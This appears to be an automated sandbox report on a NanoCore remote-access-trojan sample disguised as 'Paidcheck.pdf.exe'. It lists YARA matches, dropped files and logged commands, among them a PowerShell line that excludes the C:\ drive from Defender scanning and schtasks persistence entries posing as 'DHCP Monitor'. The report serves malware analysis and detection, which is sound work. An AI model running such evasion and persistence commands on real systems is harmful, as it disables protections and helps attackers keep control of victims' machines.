      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Paidcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: explorerr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/24@0/1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrnJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:484:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbsJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: Paidcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile read: C:\Users\user\Desktop\Paidcheck.pdf.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Paidcheck.pdf.exe 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Paidcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: Paidcheck.pdf.exe, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: explorerr.exe.0.dr, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.2.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: Paidcheck.pdf.exeStatic PE information: 0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3795 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3791 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3785 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3775 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3771 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF375D push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3735 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3735 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3731 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF372D push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF6594 push E9072621h; retf
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF2A70 push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF2A35 push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF1A22 push ss; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF1A10 push ss; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF29CE push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B2313F push cs; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B23D3C push ds; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B23D05 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_007644A3 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00764469 push cs; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00764289 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509ACFA push E801005Eh; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B114 push 8BC04589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B161 push 8BBC4589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B1A8 push 8BB84589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B1F1 push 8BB44589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B235 push 8BB04589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA4289 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA4469 push cs; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA44A3 push es; retf
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJump to dropped file
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrnJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe\:Zone.Identifier:$DATAJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
      Source: Possible double extension: pdf.exeStatic PE information: Paidcheck.pdf.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
